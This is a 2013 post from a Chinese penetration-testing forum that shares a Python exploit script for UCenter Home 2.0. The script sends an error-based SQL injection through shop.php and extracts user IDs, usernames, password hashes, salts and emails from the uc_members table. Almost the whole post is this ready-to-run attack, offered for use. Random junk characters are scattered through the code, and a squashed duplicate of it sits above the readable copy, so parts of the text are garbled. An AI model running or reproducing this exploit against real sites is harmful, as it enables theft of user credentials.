找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1949|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
5 x/ N1 u7 ^9 B$ ^/ x5 l0 @* d ! Y2 b1 a4 V; o/ e' H; k$ q

2 z9 K- i4 E' O  m#!/usr/bin/env python  
! S8 V( V& V( K5 E
+ P- t1 y: ]2 ?5 {import sys  $ i4 z# o! _4 K5 m6 I, {% ~7 k4 g
import urllib2  & z4 P3 [* P4 f4 @% M9 E  x" J
import re  
& ]" ~! D! X% x0 V. p9 @0 m
7 U: |  b+ s' K  n" ]def info():  9 j& s1 h' |! t0 V# c6 W7 Z. n
    print 'From:http://www.exploit-db.com/exploits/14997/'
5 O2 c' h2 z8 R  u1 o  @+ V2 }    print 'http://www.hake.cc/Web_loudong/'
6 |3 v8 E! `. f: D    print 'changed:qiaoy'  
2 w. q5 \5 M) [3 W, O8 t1 N    print 'exp:'  
+ @; ], k! h* C3 ]    print ' ./UCenter_Home_2.0.py site'  ) G0 {& T% n, Y2 m) r0 g# p8 Z
* V) X# B5 t6 Q. V" g: o$ f7 \( q
def main():  
: p# v* ?; w5 p) J- ~    if len(sys.argv) != 2:  
- u2 R, k, c* u% o0 E' W9 ~        info()  
5 H/ e% ~2 H9 Q1 r5 A" v- V    else:  9 ~, @# r( X* `: l% l
        site = sys.argv[1]  4 z1 G+ g+ W  S* B: i5 g' f1 g, ^$ P
        if site[0:7] == 'http://':  ! r# m: Q+ p8 B+ y
            sitesite =site  
0 \- h% b/ A. ]0 M        elif site[0:8] == 'https://':  1 Q7 v: T0 \; _! [1 z* i
            sitesite = site  
. K3 {7 _& S- F) l        else:  # {; H* ?! _$ K- G0 C
            site = 'http://'+site  
) ^" O8 O8 l: \. ~: Z0 B, S        try:  
+ n8 D. _  c% ^            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
) ]+ V0 s$ m5 Y" ?7 L% K8 x            Value = urllib2.urlopen(url).read()  
. F' N4 M+ ^* a. T, j' A            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  ; e8 R9 E. k2 X9 y2 I
            hacked = Msg.split(':')  9 P4 Z* E  R2 i: C5 L/ N7 n
            print 'Name:    '+hacked[1]  
, n1 Q/ U# f3 p            print 'Passwd:  '+hacked[2]  
3 r" t' H. |2 _- x            print 'salt:    '+hacked[3]  
6 m5 M7 L! M5 F+ `            print 'email:   '+hacked[4]  
8 N% _+ h/ n# e% e0 Y2 @+ A9 d        except:  & S9 t+ S* E, ~5 Z' _4 U* F" _
            print 'Sorry,I can\'t work............'  * q6 E8 u/ N' y' G: x( H

& X. n: S, x) Q, F8 n- Hif __name__ == '__main__':  # y) U9 T! a' r3 ]+ |3 @" F1 E
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表